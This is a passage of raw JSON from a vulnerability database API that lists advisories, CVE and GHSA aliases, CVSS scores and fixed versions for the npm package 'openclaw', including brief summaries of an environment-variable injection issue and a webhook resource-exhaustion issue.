pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-31990","GHSA-cfvj-7rx7-fc7c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e31s-2etq-6fdq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90221?format=json","vulnerability_id":"VCID-e4ac-qm17-qbf5","summary":"## Impact\n\nOpenClaw Host-Exec Environment Variable Injection.\n\nHost exec could inherit environment variables that influence interpreters, shells, or build tools.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.28`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @wsparks-vc for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-w9j9-w4cp-6wgr","reference_id":"GHSA-w9j9-w4cp-6wgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w9j9-w4cp-6wgr"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr","reference_id":"GHSA-w9j9-w4cp-6wgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-w9j9-w4cp-6wgr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e4ac-qm17-qbf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90046?format=json","vulnerability_id":"VCID-eaaf-8rfa-f3hz","summary":"Duplicate Advisory: OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rm59-992w-x2mv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. Attackers can send large or malicious webhook requests to exhaust server resources without authentication by bypassing signature validation.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"},{"reference_url":"https://github.com/advisories/GHSA-36cp-mh65-x882","reference_id":"GHSA-36cp-mh65-x882","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-36cp-mh65-x882"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2kr